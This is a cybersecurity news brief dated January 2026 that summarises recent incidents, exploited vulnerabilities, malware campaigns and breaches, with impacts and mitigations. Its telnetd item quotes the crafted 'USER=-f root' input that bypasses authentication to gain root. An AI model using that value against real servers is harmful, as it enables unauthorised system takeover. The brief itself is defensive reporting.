Svoboda Cybersecurity Brief January 27, 2026

Sandworm APT Targets Polish Power Grid with New Wiper Malware

Russian state-sponsored group Sandworm (APT44) deployed a new DynoWiper malware in a December 2025 attack on Poland’s power grid. The attack targeted CHP plants and a renewable energy management system but was thwarted before causing disruptions. The campaign aligns with Sandworm’s decade-long history of critical infrastructure attacks.
Source: SecurityWeek

VMware vCenter RCE Flaw (CVE-2024-37079) Actively Exploited

A critical heap overflow vulnerability in VMware vCenter Server’s DCERPC protocol is under active exploitation, allowing unauthenticated RCE. CISA has mandated federal agencies to patch within 3 weeks.
Impact: Remote code execution with low attack complexity.
Mitigation: Apply VMware patches released in June 2024 or disable affected services.
Source: SecurityWeek

Stanley MaaS Tool Bypasses Chrome Web Store Security for Phishing

The Stanley malware-as-a-service toolkit ($2K–$6K) creates Chrome extensions that overlay phishing pages via full-screen iframes while showing legitimate URLs. Guarantees bypass of Google’s review process and supports geotargeting.
Impact: Credential theft via malicious extensions.
Mitigation: Limit browser extensions, verify publishers, and monitor for suspicious activity.
Source: BleepingComputer

CISA Confirms Exploitation of VMware CVE-2024-37079 in the Wild

Broadcom confirmed active exploitation of the DCERPC heap overflow flaw (CVSS 9.8) in vCenter Server. No workarounds exist; patching is the only mitigation.
Impact: Unauthenticated RCE via network access.
Mitigation: Upgrade to vCenter Server 8.0 U2d or later.
Source: SecurityWeek

ClickFix Campaign Abuses Windows App-V Scripts to Deploy Amatera Stealer

Attackers use fake CAPTCHA prompts to trick users into executing a malicious App-V script, which proxies PowerShell to deliver the Amatera infostealer. The attack employs steganography (PNG LSB) for payload hiding.
Impact: Credential and browser data theft.
Mitigation: Disable App-V components, restrict PowerShell execution, and monitor outbound connections.
Source: BleepingComputer

800,000 Telnet Servers Vulnerable to GNU InetUtils Auth Bypass (CVE-2026-24061)

A critical flaw in GNU InetUtils’ telnetd allows root access via crafted USER=-f root exploits. Shadowserver reports 800K+ exposed instances, primarily in Asia.
Impact: Unauthenticated root access.
Mitigation: Upgrade to InetUtils 2.8 or disable telnetd.
Source: BleepingComputer

Cloudflare BGP Misconfiguration Causes IPv6 Route Leak

A 25-minute BGP misconfiguration redirected IPv6 traffic incorrectly, causing 12 Gbps of dropped traffic. The issue stemmed from overly permissive export policies in Miami.
Mitigation: Implement RFC 9234 and RPKI ASPA adoption.
Source: BleepingComputer

NPM Git Dependency Flaws Bypass Shai-Hulud Protections

Threat actors can bypass NPM’s --ignore-scripts defense via malicious .npmrc files in Git repos, enabling arbitrary code execution. Other package managers (pnpm, Bun) have patched.
Impact: Supply-chain attacks via Git dependencies.
Mitigation: Audit Git-sourced dependencies and use lockfiles.
Source: BleepingComputer

Hungarian-Romanian Police Arrest Hackers for Swatting, Doxing

Four suspects used Discord disputes to coordinate fake bomb threats and doxing, triggering large-scale police responses.
Source: DataBreaches

Crunchbase Confirms Data Breach After ShinyHunters Leak

ShinyHunters leaked 400MB of corporate data, including PII and contracts, after a ransom was refused. The breach stemmed from network intrusion.
Source: SecurityWeek

Badbox 2.0 Botnet Operators Linked to Chinese Developers

Kimwolf botnet admins breached Badbox 2.0’s control panel, revealing ties to Beijing-based firms like Astrolink Wireless. Badbox infects Android TV boxes pre-installation.
Source: KrebsOnSecurity

Share this brief: https://svo.bz/qVYC